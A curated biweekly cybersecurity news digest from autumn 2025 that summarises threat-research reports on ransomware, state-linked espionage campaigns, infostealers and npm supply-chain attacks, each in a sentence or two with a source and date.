Acronis Threat Research Unit (TRU) observed a global malvertising / SEO campaign, tracked as “TamperedChef.” Read more.

Meet ShinySp1d3r: New Ransomware-as-a-Service created by ShinyHunters

Source: BleepingComputer
(Published: 19 November 2025)
An in-development build of the upcoming ShinySp1d3r ransomware-as-a-service platform has surfaced, offering a preview of the upcoming extortion operation. Read more.

PlushDaemon compromises network devices for adversary-in-the-middle attacks

Source: ESET WeLiveSecurity
(Published: 19 November 2025)
ESET researchers provide insights into how PlushDaemon performs adversary-in-the-middle attacks using a previously undocumented network implant called EdgeStepper. Read more.

Beyond the Watering Hole: APT24’s Pivot to Multi-Vector Attacks

Source: Google Cloud
(Published: 20 November 2025)
Google Threat Intelligence Group (GTIG) is tracking a long-running and adaptive cyber espionage campaign by APT24, a People’s Republic of China (PRC)-nexus threat actor. Read more.

ToddyCat: your hidden email assistant. Part 1

Source: Securelist (Kaspersky)
(Published: 21 November 2025)
Email remains the main means of business correspondence at organizations. Read more.

China’s APT31 linked to hacks on Russian tech firms

Source: The Record
(Published: 21 November 2025)
The China-linked hacking group known as APT31 infiltrated Russia’s technology sector for years and quietly exfiltrated data from companies involved in government contracting and systems integration, according to a new report. Read more.

Brazilian Campaign: Spreading the Malware via WhatsApp

Source: K7 Labs
(Published: 21 November 2025)
K7 Labs found out from a tweet about a massive phishing campaign going on against Brazil, spreading the malware via WhatsApp Web from the victim’s machine to their contacts by using the open source WhatsApp automation script from GitHub and also loading a banking trojan into memory. Read more.

The Korean Leaks – Analyzing the Hybrid Geopolitical Campaign Targeting South Korean Financial Services With Qilin RaaS

Source: Bitdefender
(Published: 24 November 2025)
TL;DR The “Korean Leaks” campaign showcases a sophisticated supply chain attack against South Korea’s financial sector. Read more.

Weekly DDoSIA Threat Intelligence: Sweden

Source: SOCRadar
(Published: 24 November 2025)
NoName057(16), a pro-Russian hacktivist group, conducted coordinated DDoS attacks on Swedish organizations between November 10 and 16, 2025, as part of its ongoing campaign against countries supporting Ukraine. Read more.

South-east Asia increasingly targeted as cybercrime groups launch global attacks: report

Source: The Business Times
(Published: 25 November 2025)
South-east Asia is increasingly being targeted by cybercriminals leveraging the region’s rapid digitalization and expanding attack surface to launch global campaigns. Read more.

Defending Against Sha1-Hulud: The Second Coming

Source: SentinelOne
(Published: 25 November 2025)
A new wave of compromised NPM packages is leading to wide-scale supply chain attacks. Read more.

Inside the GitHub Infrastructure Powering North Korea’s Contagious Interview npm Attacks

Source: Socket
(Published: 26 November 2025)
The Socket Threat Research Team continues to track North Korea’s Contagious Interview operation as it systematically infiltrates the npm ecosystem. Read more.

Is Zendesk Scattered Lapsus$ Hunters’ Latest Campaign Target?

Source: ReliaQuest
(Published: 26 November 2025)
ReliaQuest has uncovered indications of a potential new campaign from the notorious threat collective “Scattered Lapsus$ Hunters,” this time targeting users of the customer support software Zendesk. Read more.

Xillen Stealer Updates to Version 5 to Evade AI Detection

Source: Darktrace
(Published: 26 November 2025)
Darktrace has observed a new version of the Xillen Stealer malware, designed to exfiltrate sensitive data including credentials, financial information, and cryptowallet keys. Read more.

Deepseek May Intentionally Produce Malicious Code Due to Chinese Political Bias, Research Shows

Source: Foundation for Defense of Democracies (FDD)
(Published: 26 November 2025)
A Chinese AI model may be intentionally generating harmful code due to political biases embedded in its training data, according to new research. Read more.

Albiriox RAT: Mobile Malware Targeting Global Finance and Crypto Wallets

Source: Cleafy Labs
(Published: 26 November 2025)
Cleafy Labs identified a new Android Remote Access Trojan (RAT) dubbed Albiriox, which targets global banking and crypto wallet applications. Read more.

Inside Valkyrie Stealer: Capabilities, Evasion Techniques, and Operator Profile

Source: DExpose
(Published: 26 November 2025)
The DExpose research team analyzed a new info-stealing malware known as Valkyrie, uncovering its core capabilities and operator tradecraft. Read more.

Shai-Hulud 2.0 Exposes Over 33,000 Unique Secrets [Updated Nov, 27]

Source: GitGuardian
(Published: 27 November 2025)
In this report, we detail how the Shai-Hulud 2.0 supply chain attack exposed tens of thousands of unique secrets across hundreds of affected projects. Read more.

TangleCrypt: a sophisticated but buggy malware packer

Source: WithSecure Labs
(Published: 27 November 2025)
Just like most malware packers, TangleCrypt’s main objective is to hide the actual payload and make it look like a benign file. Read more.

Inside Morte Loader: How Loader as a Service Builds Modern Botnets

Source: SOCRadar
(Published: 27 November 2025)
Morte is a Loader as a Service (LaaS) that turns vulnerable SOHO routers, IoT devices and web applications into a flexible botnet platform. Read more.

APT36’s Python-based ELF Malware Targeting Indian Government Entities

Source: Cyfirma
(Published: 27 November 2025)
CYFIRMA researchers observed APT36 deploying a new Python-based ELF malware variant against Indian government agencies. Read more.

Palo Alto Scanning Surges to a 90-Day High

Source: GreyNoise
(Published: 27 November 2025)
GreyNoise observed a dramatic spike in scanning activity targeting Palo Alto Networks devices, reaching the highest level in 90 days. Read more.

FlexibleFerret Malware Continues to Adapt

Source: Jamf
(Published: 27 November 2025)
Jamf Threat Labs is tracking FlexibleFerret, a multi-stage malware family targeting macOS users with evolving techniques. Read more.

Morphisec Thwarts Russian-linked Stealc v2 Campaign Targeting Blender Users via Malicious .blend Files

Source: Morphisec
(Published: 27 November 2025)
Morphisec detected and blocked an attack campaign leveraging weaponized Blender .blend files to distribute Stealc v2, a Russian-linked infostealer. Read more.

The Pain in the Mist: Navigating Operation DreamJob’s Arsenal

Source: Orange Cyberdefense
(Published: 27 November 2025)
Orange Cyberdefense researchers shed light on new tooling, infrastructure and phishing techniques attributed to the North Korea-nexus Operation DreamJob. Read more.

Scattered Lapsus$ Hunters Intensifican la Venta de Accesos FortiOS en DarkForums, con Foco en Latinoamérica

Source: Devel Group
(Published: 28 November 2025)
En DarkForums, un vendedor identificado como “miyako”, señalado por la comunidad como parte del ecosistema cercano a Scattered Lapsus$ Hunters, ha publicado de manera constante accesos comprometidos a organizaciones vulneradas mediante fallas en FortiOS. Read more.

Tomiris wreaks Havoc: New tools and techniques of the APT group

Source: Securelist (Kaspersky)
(Published: 28 November 2025)
While tracking the activities of the Tomiris threat actor, we identified new malicious operations that began in early 2025. Read more.

Thousands of sensitive secrets published on JSONFormatter and CodeBeautify

Source: Security Affairs
(Published: 28 November 2025)
Users of JSONFormatter and CodeBeautify leaked thousands of sensitive secrets, including credentials and private keys, WatchTowr warns. Read more.

Critical Flaw in Oracle Identity Manager Under Exploitation

Source: Dark Reading
(Published: 28 November 2025)
Attackers are exploiting a critical privilege escalation vulnerability in Oracle Identity Manager, prompting urgent patching recommendations. Read more.

Inside ShadyPanda: A 7-Year Malware Campaign That Infected 4 Million Browsers

Source: Koi Labs
(Published: 28 November 2025)
Koi Labs uncovered a massive multi-year surveillance and credential harvesting operation known as ShadyPanda, affecting more than 4 million browser installations worldwide. Read more.

THOR vs. Silver Fox: Uncovering and Defeating a Sophisticated ValleyRAT Campaign

Source: Nextron Systems
(Published: 28 November 2025)
Nextron Systems researchers analyzed a new ValleyRAT campaign named “Silver Fox,” uncovering and mitigating the threat using THOR YARA and behavioral analytics. Read more.

Candiru/DevilsTongue Spyware: Tracking the Global Operations

Source: Recorded Future
(Published: 29 November 2025)
Recorded Future’s Insikt Group analyzed ongoing DevilsTongue spyware activity attributed to the Israeli vendor Candiru. Read more.

DNS Uncovers Infrastructure Used in SSO Attacks

Source: Infoblox
(Published: 1 December 2025)
We recently received a tip from a customer that their institution was under recurring attacks that targeted their student single sign-on (SSO) portal. Read more.

EDR-Freeze: The User-Mode Attack That Puts Security Into a Coma

Source: Picus Security
(Published: 1 December 2025)
EDR-Freeze is a user-mode attack technique that abuses the dependency of endpoint detection and response solutions on user-mode telemetry to blind security monitoring. Read more.

Google Addresses 107 Android Vulnerabilities, Including Two Zero-Days

Source: CyberScoop
(Published: 1 December 2025)
Google disclosed two actively exploited zero-day vulnerabilities Monday, which it addressed among a total of 107 defects in the company’s monthly security update for Android devices. Read more.

Shai-Hulud 2.0 Aftermath: Ongoing Supply Chain Attack

Source: Wiz
(Published: 1 December 2025)
Wiz researchers are tracking an ongoing supply chain attack involving Shai-Hulud 2.0 that continues to impact organizations through compromised npm packages and cloud workloads. Read more.

Microsoft Chat With Anyone: Understanding the Phishing Risk

Source: Ontinue
(Published: 1 December 2025)
Attackers are abusing Microsoft’s Chat With Anyone features to socially engineer victims into credential theft and phishing attacks. Read more.

Water Saci: Stealthy Banking Malware Leveraging AI and Obfuscation

Source: Trend Micro
(Published: 2 December 2025)
Through AI-driven code analysis and large-scale telemetry, Trend Micro researchers uncovered Water Saci, a stealthy banking malware family that targets financial institutions with sophisticated evasion techniques. Read more.

Insider Threat Detection: Key Warning Signs Your Organization Cannot Ignore

Source: Nisos
(Published: 2 December 2025)
Insider activity rarely appears malicious in the beginning. Read more.

ShadowV2 casts a shadow over IoT devices

Source: Fortinet
(Published: 2 December 2025)
Fortinet researchers are tracking ShadowV2, an IoT-focused malware that expands on the capabilities of its predecessor with stealthier persistence mechanisms. Read more.

Want more articles? Check out the previous edition of Security Signals here.

Take advantage of our free data evaluation.

REQUEST NOW

Security Signals (11/04/25-11/18/25)

Cybersecurity News

Welcome to your biweekly digest of curated cybersecurity intelligence.

For more articles, check out our #onpatrol4malware blog.

Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators OSINT feeds help you apply them.

SUBSCRIBE FOR FREE

This Edition’s Articles

The latest November 2025 cyber threat reports reveal a surge in high-impact activity across the global threat landscape, from major ransomware developments like LockBit 5.0 and VanHelsing to new espionage operations linked to Lazarus, APT42, and multiple Iran-aligned groups. This roundup also covers expanding phishing campaigns, advanced Android and Windows malware families, supply-chain intrusions, and the growing use of AI tools in both attack and defense.

Dissecting the Infection Chain: Technical Analysis of the Kimsuky JavaScript Dropper

Source: Pulsedive Threat Research
(Published: 5 November 2025)
This blog analyzes a Kimsuky JavaScript dropper sample, detailing how it retrieves additional stages and the network traffic observed across the full infection chain. Read more.

Update on Attacks by Threat Group APT-C-60

Source: JPCERT/CC Eyes
(Published: 5 November 2025)
JPCERT/CC provides an update on recent attacks linked to APT-C-60, summarizing new intrusion methods, infrastructure, and targeting patterns observed in Japan and abroad. Read more.

Herodotus: a banking trojan that exposes the limits of an antivirus

Source: Pradeo
(Published: 6 November 2025)
Pradeo describes Herodotus, a new Android banking trojan offered as Malware as a Service that masquerades as a legitimate app, gains sensitive permissions, and performs fraudulent banking operations on behalf of victims. Read more.

Phishing Campaigns “I Paid Twice” Targeting Booking.com Hotels and Customers

Source: Sekoia.io
(Published: 6 November 2025)
Sekoia.io analysts detail a phishing campaign abusing compromised Booking.com accounts and messaging apps to trick hotel staff and guests, ultimately delivering malware and running banking fraud schemes. Read more.

Slot Gacor: The Rise of Online Casino Spam

Source: Sucuri Security
(Published: 7 November 2025)
Sucuri explains how online casino spam has become one of the most prevalent SEO spam threats, with attackers hacking websites to inject hidden backlinks that promote gambling portals. Read more.

Threat actor usage of AI tools

Source: Google Threat Intelligence Group
(Published: 7 November 2025)
Google Threat Intelligence Group examines how threat actors are adopting AI tools across the attack lifecycle, from crafting phishing content to supporting malware development and operational workflows. Read more.

Distribution of Backdoor Malware with Legitimate Signature, Disguised as Steam Cleanup Tool

Source: AhnLab ASEC
(Published: 10 November 2025)
ASEC reports multiple cases of malware posing as the SteamCleaner utility, installing a malicious Node.js script that periodically contacts C2 servers to execute commands on infected systems. Read more.

New Phishing Campaign Exploits Meta Business Suite to Target SMBs Across the U.S. and Beyond

Source: Check Point Software
(Published: 10 November 2025)
Check Point Harmony Email Security researchers uncover a large scale phishing campaign abusing Meta Business Suite and facebookmail.com to send convincing notifications that steal credentials from small and mid sized businesses. Read more.

Analysis of Encryption Structure of Yurei Ransomware Go-based Builder

Source: AhnLab ASEC
(Published: 11 November 2025)
ASEC analyzes the Go based Yurei ransomware builder, detailing its ChaCha20 Poly1305 file encryption, ECIES key protection, and targeting of organizations across several industries in Sri Lanka and Nigeria. Read more.

Amazon discovers APT exploiting Cisco and Citrix zero-days

Source: AWS Security Blog
(Published: 12 November 2025)
Amazon threat intelligence teams describe an advanced actor exploiting zero day vulnerabilities in Cisco Identity Services Engine and Citrix systems, deploying custom web shells and targeting critical identity infrastructure. Read more.

Contagious Interview Actors Now Utilize JSON Storage Services for Malware Delivery

Source: NVISO Labs
(Published: 13 November 2025)
NVISO reports that the Contagious Interview campaign now abuses legitimate JSON storage services to host obfuscated payloads delivered through trojanized code projects used in fake job interviews. Read more.

Arsenal Analysis of a Nation-State Actor: An In-Depth Look at Lazarus ScoringMathTea

Source: 0x0d4y Malware Research
(Published: 13 November 2025)
This post builds on prior ESET research into Operation Dream Magic to analyze the Lazarus ScoringMathTea toolset, focusing on its capabilities, infrastructure, and links to earlier campaigns. Read more.

Curly COMrades: Evasion and Persistence via Hidden Hyper-V Virtual Machines

Source: Bitdefender
(Published: 4 November 2025)
The investigation revealed that the attackers relied on a combination of custom malware and stealth techniques to establish and maintain persistence within the victim environment. Read more.

Cloudflare Scrubs Aisuru Botnet from Top Domains List

Source: KrebsOnSecurity
(Published: 5 November 2025)
For the past week, domains associated with the massive Aisuru botnet have repeatedly usurped Amazon, Apple, Google and Microsoft in Cloudflare’s public ranking of the most frequently requested websites. Read more.

New Kimsuky Malware ‘EndClient RAT’: First Technical Report and IOCs

Source: 0x0v1
(Published: 5 November 2025)
The MSI bundle, after installing the banking software and displaying the bogus VBS script mentioned above, starts by creating a BAT script which copies the AutoIt3.exe binary and the Au3 script which is heavily obfuscated. Read more.

LockBit 5.0 Analysis: Technical Deep Dive into the RaaS Giant’s Latest Upgrade

Source: Flashpoint
(Published: 6 November 2025)
LockBit 5.0, introduced in late September 2025, is the latest evolution of this dominant ransomware-as-a-service group, bringing new anti-analysis features and more flexible encryption options. Read more.

MUT-4831: Trojanized npm packages deliver Vidar infostealer malware

Source: Datadog Security Labs
(Published: 6 November 2025)
In two bursts, over the periods of October 21-22 and 26, the researchers observed a total of 23 releases of 17 distinct packages containing these and similar indicators. Read more.

Critical Cisco UCCX flaw lets hackers run commands as root

Source: BleepingComputer
(Published: 6 November 2025)
A critical security flaw in Cisco’s Unified Contact Center Express platform allows attackers to run commands as root on vulnerable systems. Read more.

LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices

Source: Unit 42 by Palo Alto Networks
(Published: 7 November 2025)
Unit 42 researchers have identified a new commercial-grade Android spyware family dubbed LANDFALL that is delivered through an exploit chain targeting Samsung devices. Read more.

DarkComet Spyware Resurfaces Disguised as Fake Bitcoin Wallet

Source: HackRead
(Published: 12 November 2025)
Old DarkComet RAT spyware is back, hiding inside fake Bitcoin wallets and trading apps to steal credentials via keylogging. Read more.

Malicious Chrome Extension Exfiltrates Seed Phrases, Enabling Crypto Theft

Source: Socket
(Published: 12 November 2025)
A malicious Chrome extension posing as an Ethereum wallet steals seed phrases by encoding them into Sui transactions, enabling full wallet takeover. Read more.

The COM: Anatomy of an English-Speaking Cybercriminal Ecosystem and the Origins of Scattered Lapsus Hunters

Source: CloudSEK
(Published: 12 November 2025)
Over the past decade, the English-speaking cybercriminal ecosystem commonly referred to as “The COM” has undergone a profound transformation. Read more.

Critical FortiWeb flaw under attack, allowing complete compromise

Source: Security Affairs
(Published: 14 November 2025)
A Fortinet FortiWeb auth-bypass flaw is being actively exploited, allowing attackers to hijack admin accounts and fully compromise devices. Read more.

Iranian Hackers Launch ‘SpearSpecter’ Spy Operation on Defense and Government Targets

Source: The Hacker News
(Published: 14 November 2025)
The Iranian state-sponsored threat actor known as APT42 has been observed targeting government and defense organizations with a new espionage campaign codenamed SpearSpecter. Read more.

DDoSia Targets Denmark: A Clear Look at the Threat

Source: SOCRadar
(Published: 17 November 2025)
Between November 4 and November 13, 2025, Denmark was included in a focused campaign by pro-Russian hacktivist groups. Read more.

IndonesianFoods Spam Campaign: What Security Teams Need To Know

Source: SOCRadar
(Published: 17 November 2025)
A large-scale campaign known as IndonesianFoods has recently gained attention for its unusual impact on the npm ecosystem. Read more.

Tracking a Dragon: Investigating a DragonForce-affiliated ransomware attack with Darktrace

Source: Darktrace
(Published: 5 November 2025)
Darktrace investigates a DragonForce-affiliated ransomware attack targeting the manufacturing sector, tracing the intrusion from initial access through to ransomware deployment. Read more.

Gootloader Threat Detection: WOFF2 Obfuscation and Evasion Tactics

Source: Huntress
(Published: 5 November 2025)
Gootloader is a sophisticated JavaScript-based malware loader that threat actors commonly use to gain initial access. Read more.

GlassWorm Returns: New Wave Strikes as We Expose Attacker Infrastructure

Source: Koi Security
(Published: 6 November 2025)
Almost three weeks ago, we disclosed GlassWorm, the first self-propagating worm targeting VS Code extensions using invisible Unicode characters, and now we are seeing a new wave of infections linked to the same attacker infrastructure. Read more.

Lazarus Group targets Aerospace and Defense with new Comebacker variant

Source: Enki
(Published: 7 November 2025)
Enki researchers detail a new Comebacker malware variant deployed by the Lazarus Group against aerospace and defense organizations, expanding the threat actor’s long-running espionage toolkit. Read more.

Maverick and Coyote: Analyzing the link between two evolving Brazilian banking trojans

Source: CyberProof
(Published: 10 November 2025)
The CyberProof SOC Team has observed overlapping infrastructure and tooling connecting the Brazilian banking trojans Maverick and Coyote, suggesting a shared developer or tightly coordinated operators. Read more.

Dissecting ValleyRAT: From loader to RAT execution in targeted campaigns

Source: Picus Security
(Published: 11 November 2025)
Picus researchers analyze ValleyRAT’s loader, staging chain, and command-and-control behavior observed in recent targeted attacks against organizations in East Asia. Read more.

Initial Access Brokers (IAB) in 2025: From dark web listings to supply chain ransomware events

Source: Darknet.org.uk
(Published: 12 November 2025)
Initial Access Brokers are specialist cybercriminals who sell or rent compromised footholds in corporate networks, enabling ransomware gangs and other actors to launch disruptive attacks with minimal effort. Read more.

Thousands of domains target hotel guests in massive phishing campaign

Source: Netcraft
(Published: 12 November 2025)
Netcraft has identified thousands of lookalike domains impersonating hotel brands and booking platforms to lure guests into phishing pages that steal credentials and payment information. Read more.

DigitStealer: a JXA-based infostealer that leaves little footprint

Source: Jamf
(Published: 13 November 2025)
Jamf Threat Labs dissects the new DigitStealer malware, a sophisticated macOS infostealer that uses advanced hardware checks and multi-stage attacks to evade detection and steal sensitive data. Read more.

Uncovering a Multi-Stage Phishing Kit Targeting Italy’s Infrastructure

Source: Group-IB
(Published: 13 November 2025)
Group-IB researchers uncovered a professional phishing framework that mimics trusted brands with remarkable precision, using layered evasion, CAPTCHA filtering, and Telegram-based data exfiltration to harvest credentials and bypass automated detection. Read more.

Unmasking Vo1d: Inside Darktrace’s botnet detection

Source: Darktrace
(Published: 14 November 2025)
Earlier this year, Darktrace investigated the Vo1d malware campaign, tracing its activity from DGA-based DNS beaconing to major cloud infrastructure and ultimately to its C2 server communications. Read more.

Pig Butchering Scams: Cybercrime Threat Intelligence

Source: Cyfirma
(Published: 15 November 2025)
Pig butchering scams, also known as romance or cryptocurrency investment scams, are long-term social engineering schemes in which attackers build trust before defrauding victims of large sums of money. Read more.

RONINGLOADER: DragonBreath’s new path to PPL abuse

Source: Elastic Security Labs
(Published: 15 November 2025)
This campaign primarily targets Chinese-speaking users and demonstrates a clear evolution in adaptability compared to earlier DragonBreath-related campaigns documented in 2022-2023. Read more.

100,000 WordPress Sites Affected by Privilege Escalation Vulnerability in AI Engine WordPress Plugin

Source: Wordfence
(Published: 4 November 2025)
On October 4th, 2025, we received a submission for a Sensitive Information Exposure vulnerability in AI Engine, a WordPress plugin with more than 100,000 active installations. Read more.

Crossed wires: a case study of Iranian espionage and attribution

Source: Proofpoint
(Published: 5 November 2025)
This analysis examines a newly identified threat actor dubbed UNK_SmudgedSerpent that targeted academics and foreign policy experts between June and August 2025. Read more.

Private data at risk due to seven ChatGPT vulnerabilities

Source: Tenable
(Published: 5 November 2025)
Tenable Research has identified seven vulnerabilities in ChatGPT that could enable an attacker to exfiltrate private information from users’ memories and chat history. Read more.

UNC6384’s 2025 PlugX Campaign Explained

Source: Picus Security
(Published: 6 November 2025)
In March 2025, UNC6384 ran a targeted espionage campaign against diplomatic and related organizations, employing a multi-stage, highly evasive delivery chain that culminated in the in-memory deployment of the SOGU.SEC/PlugX backdoor. Read more.

Fantasy Hub: Another Russian Based RAT as M-a-a-S

Source: Zimperium
(Published: 6 November 2025)
zLabs identified “Fantasy Hub,” an Android Remote Access Trojan sold on Russian-language channels under a Malware-as-a-Service (MaaS) subscription. Read more.

The Cat’s Out of the Bag: A ‘Meow Attack’ Data Corruption Campaign Simulation via MAD-CAT

Source: Trustwave SpiderLabs
(Published: 7 November 2025)
In 2024, I published Feline Hackers Among Us? (A Deep Dive and Simulation of the Meow Attack), which explored the notorious Meow attack campaign that had plagued unsecured databases since 2020. Read more.

Multi-Platform VanHelsing Ransomware (RaaS) Analysis

Source: Picus Security
(Published: 8 November 2025)
A new and rapidly expanding ransomware operation, dubbed VanHelsing, has emerged on the cybercrime scene. Read more.

Ferocious Kitten APT Exposed: Inside the Iran-Focused Espionage Campaign

Source: Picus Security
(Published: 10 November 2025)
Ferocious Kitten is a covert cyber-espionage actor active since at least 2015 that has focused on Persian-speaking targets inside Iran, using politically themed decoy documents to trick dissidents, activists, and other individuals into opening weaponized files. Read more.

GreenCharlie APT: Iran’s PowerShell-Based Cyber Espionage Campaigns

Source: Picus Security
(Published: 11 November 2025)
GreenCharlie is an Iran-based advanced persistent threat (APT) group known for its active cyber-espionage and phishing operations. Read more.

MalKamak APT’s ShellClient RAT: Inside Operation GhostShell

Source: Picus Security
(Published: 11 November 2025)
MalKamak group has been active since at least 2018 and was observed in a targeted espionage campaign that peaked in July 2021, focusing primarily on the aerospace and telecommunications sectors in the Middle East, with additional victims in the U.S., Russia, and Europe. Read more.

NGate: NFC Relay Malware Enabling ATM Withdrawals Without Physical Cards

Source: Zimperium
(Published: 12 November 2025)
CERT Polska has recently uncovered a sophisticated Android malware family dubbed NGate, designed to perform NFC relay attacks targeting Polish bank customers. Read more.

Operation Endgame Quakes Rhadamanthys

Source: Proofpoint
(Published: 13 November 2025)
Rhadamanthys malware has evolved significantly over time, reflecting ongoing advancements in cybercriminal techniques. Read more.

Increase in Lumma Stealer Activity Coincides with Use of Adaptive Browser Fingerprinting Tactics

Source: Trend Micro
(Published: 13 November 2025)
In this blog entry, Trend Research analyses the layered command-and-control approaches that Lumma Stealer uses to maintain its ongoing operations while enhancing collection of victim-environment data. Read more.

NotDoor Insights: A Closer Look at Outlook Macros and More

Source: Splunk
(Published: 14 November 2025)
This blog helps security analysts, blue teamers, and Splunk customers identify NotDoor, and similar malware, by enabling the community to discover related TTPs used by threat actors and adversaries. Read more.

Hide Me Again: The Updated Multi-Payload .NET Steganography Loader That Includes Lokibot

Source: Splunk
(Published: 14 November 2025)
In this blog, the Splunk Threat Research Team presents an analysis of the updated steganographic loader, including one of its payloads: the Lokibot malware. Read more.

Want more articles beyond these November 2025 cyber threat reports? Check out the previous edition of Security Signals here.

Take advantage of our free data evaluation.

REQUEST NOW

Security Signals (10/07/25-10/21/25)

Cybersecurity News

Welcome to your biweekly digest of curated cybersecurity intelligence.

For more articles, check out our #onpatrol4malware blog.

Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators OSINT feeds help you apply them.

SUBSCRIBE FOR FREE

This Edition’s Articles

In these late October 2025 cyber threat reports, global research teams uncovered an active mix of espionage, phishing, and data-theft operations. Highlights this period include North Korea’s EtherHiding and Contagious Interview campaigns, new exploits such as the Oracle EBS zero-day, COLDRIVER and Lazarus-linked attacks, and mobile threats like Pixnapping targeting Android users. Together, these findings reveal how rapidly evolving malware, cloud intrusions, and supply-chain compromises continue to test defenders’ visibility and response.

An Insider Look At The IRGC-linked APT35 Operations: Ep1 & Ep2

Source: CloudSEK
(Published: 7 October 2025)
CloudSEK’s TRIAD team analyzed the available evidence and reconstructed recent APT35 operations across two episodes of our series. Read more.

Attacker says they breached Huawei, source code sold online

Source: Cybernews
(Published: 7 October 2025)
A hacker claims to have stolen Huawei’s internal source code and sold it on an underground cybercriminal forum. Read more.

Oops! It’s a kernel stack use-after-free: Exploiting NVIDIA’s GPU Linux drivers

Source: Quarkslab
(Published: 14 October 2025)
This article details two bugs in NVIDIA’s GPU kernel driver vmalloc handling that can be chained to gain code execution in kernel context. Read more.

BombShell: The Signed Backdoor Hiding in Plain Sight on Framework Devices

Source: Eclypsium
(Published: 14 October 2025)
UEFI shell vulnerabilities allow attackers to bypass Secure Boot. Read more.

DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains

Source: Google Cloud Blog
(Published: 16 October 2025)
Google Threat Intelligence Group (GTIG) has observed a new malware delivery technique-EtherHiding-appearing in DPRK-linked activity. Read more.

BeaverTail and OtterCookie evolve with a new Javascript module

Source: Cisco Talos Blog
(Published: 16 October 2025)
Cisco Talos has uncovered a new attack linked to Famous Chollima, a threat group aligned with North Korea (DPRK). Read more.

Odyssey Stealer and AMOS Campaign Targets macOS Developers Through Fake Tools

Source: Hunt
(Published: 16 October 2025)
In recent months, our threat hunting team has observed a surge in macOS-targeted campaigns employing new social engineering tactics and persistent infrastructure. Read more.

New Group on the Block: UNC5142 Leverages EtherHiding to Distribute Malware

Source: Google Cloud Blog
(Published: 16 October 2025)
Since late 2023, UNC5142 has leveraged EtherHiding infrastructure to deliver malicious payloads and obfuscate attribution. Read more.

Joint Intel Strike – DeepCode × AMLBot Trace “1688shuju,” a Darknet Seller of Verified Exchange Numbers

Source: AMLBot
(Published: 17 October 2025)
On 22 August 2025, the DeepCode intelligence team identified a darknet marketplace listing by the actor “1688shuju” offering large batches of verified phone numbers tied to major cryptocurrency exchanges. Read more.

Email Bombs Exploit Lax Authentication in Zendesk

Source: Krebs on Security
(Published: 17 October 2025)
Cybercriminals are abusing a widespread lack of authentication in the customer service platform Zendesk to flood targeted email inboxes with menacing messages that come from hundreds of Zendesk corporate customers simultaneously. Read more.

Tykit Analysis: New Phishing Kit Stealing Hundreds of Microsoft Accounts in Finance

Source: ANY.RUN
(Published: 21 October 2025)
Not long ago we reported a spike in phishing attacks that use an SVG file as the delivery vector. Read more.

To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER

Source: Google Cloud Blog
(Published: 21 October 2025)
COLDRIVER, a Russian state-sponsored threat group known for targeting high profile individuals in NGOs, policy advisors and dissidents, swiftly shifted operations after the May 2025 public disclosure of its LOSTKEYS malware. Read more.

Red Hat data breach escalates as ShinyHunters joins extortion

Source: BleepingComputer
(Published: 6 October 2025)
Enterprise software giant Red Hat is now being extorted by the ShinyHunters gang, with samples of stolen customer engagement reports (CERs) leaked on their data leak site. Read more.

OpenAI has disrupted (more) Chinese accounts using ChatGPT to create social media surveillance tools

Source: Engadget
(Published: 7 October 2025)
OpenAI published a new threat report and banned additional China-linked accounts that used ChatGPT to design social media surveillance tools. Read more.

Maverick: Android banking trojan distributing via WhatsApp

Source: Securelist
(Published: 8 October 2025)
A malware campaign was recently detected distributing various versions of the Android banking trojan called ‘Maverick’ via WhatsApp. Read more.

Phishing campaign leveraging the npm ecosystem

Source: Snyk
(Published: 9 October 2025)
We have uncovered a large-scale phishing campaign abusing the npm ecosystem to deliver malware to developers through typosquatted packages and malicious maintainers. Read more.

Harvard University hit in Oracle EBS cyberattack, 1.3 TB of data leaked by Cl0p group

Source: Security Affairs
(Published: 10 October 2025)
Harvard University was hit in a cyberattack exploiting a zero-day in Oracle E-Business Suite (EBS), with the Cl0p ransomware gang leaking 1.3 TB of data. Read more.

PhantomVAI Loader Delivers a Range of Infostealers

Source: Unit 42 (Palo Alto Networks)
(Published: 15 October 2025)
Unit 42 researchers have been tracking phishing campaigns that use PhantomVAI Loader to deliver information-stealing malware through a multi-stage, evasive infection chain. Read more.

Pro-Hamas hackers breach B.C. and U.S. airport display systems

Source: Juno News
(Published: 15 October 2025)
A pro-Hamas Islamist group has taken credit for a series of cyberattacks at two B.C. airports and others in the U.S. Read more.

PassiveNeuron: campaign with APT implants and Cobalt Strike

Source: Securelist
(Published: 17 October 2025)
The PassiveNeuron (also known as ‘Evernight’) cyber espionage campaign relies on a broad arsenal of tools, including clusters of implants, Cobalt Strike, and modern living-off-the-land strategies. Read more.

SIMCartel operation: Europol takes down SIM box ring linked to 3,200 scams

Source: Security Affairs
(Published: 18 October 2025)
Europol has taken down a multi-country SIM boxing ring dubbed ‘SIMCartel,’ dismantling infrastructure linked to more than 3,200 scams. Read more.

F5 breach exposes 262,000 BIG-IP systems worldwide

Source: Security Affairs
(Published: 19 October 2025)
Security firm F5 disclosed a breach exposing telemetry data from 262,000 Big-IP systems worldwide after attackers accessed a support platform. Read more.

Russian Lynk group leaks sensitive UK MoD files, including info on eight military bases

Source: Security Affairs
(Published: 20 October 2025)
The Russian hacktivist group Lynk leaked sensitive UK Ministry of Defence files, including details on eight military bases. Read more.

Salty Much: Darktrace’s view on a recent Salt Typhoon intrusion

Source: Darktrace
(Published: 20 October 2025)
Salt Typhoon, a China-linked cyber espionage group, has been observed targeting global infrastructure using stealthy techniques such as DLL sideloading and zero-day exploits. Read more.

Disrupting threats targeting Microsoft Teams

Source: Microsoft Security Blog
(Published: 7 October 2025)
The extensive collaboration features and global adoption of Microsoft Teams make it a high-value target for both cybercriminals and state-sponsored actors. Read more.

Crimson Collective: A New Threat Group Observed Operating in the Cloud

Source: Rapid7 Labs
(Published: 7 October 2025)
Over the past few weeks, Rapid7 has observed increased activity of a new threat group attacking AWS cloud environments with the goal of data exfiltration and subsequent extortion. Read more.

Pixel-stealing “Pixnapping” attack targets Android devices

Source: Malwarebytes
(Published: 14 October 2025)
Researchers at US universities have demonstrated how a malicious Android app can trick the system into leaking pixel data. Read more.

Retro Phishing: Basic Auth URLs Make a Comeback in Japan

Source: Netcraft
(Published: 15 October 2025)
Netcraft recently uncovered a suspicious URL targeting GMO Aozora Bank, a Japanese financial institution. Read more.

Inside the attack chain: Threat activity targeting Azure Blob Storage

